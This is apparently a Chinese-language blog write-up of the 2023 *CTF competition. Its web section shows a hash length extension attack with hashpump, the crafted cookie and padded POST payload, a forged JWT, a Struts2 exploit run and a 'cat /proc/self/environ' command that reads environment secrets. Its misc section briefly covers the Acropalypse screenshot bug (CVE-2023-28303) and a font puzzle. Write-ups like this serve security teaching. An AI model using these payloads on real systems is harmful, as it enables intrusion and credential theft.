2023*CTF

2023*CTF

web

jwt2struts

源码里提示访问JWT_key.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
highlight_file(__FILE__);
include "./secret_key.php";
include "./salt.php";
//$salt = XXXXXXXXXXXXXX // the salt include 14 characters
//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["digest"])) {
    if ($username === "admin" && $password != "root") {
         if ($_COOKIE["digest"] === md5($salt.$username.$password)) {
            die ("The secret_key is ". $secret_key);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("no no no");
    }
}

刚开始在想怎么爆破没想到绕过,后面发现是哈希扩展长度攻击绕过md5,参考:https://blog.csdn.net/LYJ20010728/article/details/116779357

1
hashpump -s e6ccbf12de9d33ec27a5bcfb6a3293df -d adminroot -k 14 -a ddd

得到:

1
2
3
Cookie: digest=9e2b0620d7214919beaea5998acdb7fd

username=%61%64%6d%69%6e&password=root%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b8%00%00%00%00%00%00%00ddd
img

得到key:sk-he001ctf3r

jwt.io伪造token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MjAwNjIxNDE3N30.eoaKqDM23OT-iEZBhva5Yc-GKN876B9f-cbkqaQodgM

img
img

strust2一把梭

1
cat /proc/self/environ
img
img

misc

snippingTools

CVE-2023-28303

https://github.com/frankthetank-music/Acropalypse-Multi-Tool

img

old language

谷歌识图

https://zh.fonts2u.com/dovahkiin.%E5%AD%97%E4%BD%93

img
ctf web misc
#misc #wp #web
2023*CTF
http://example.com/2023/08/27/2023starCTF/
作者
dddkia
发布于
2023年8月27日
许可协议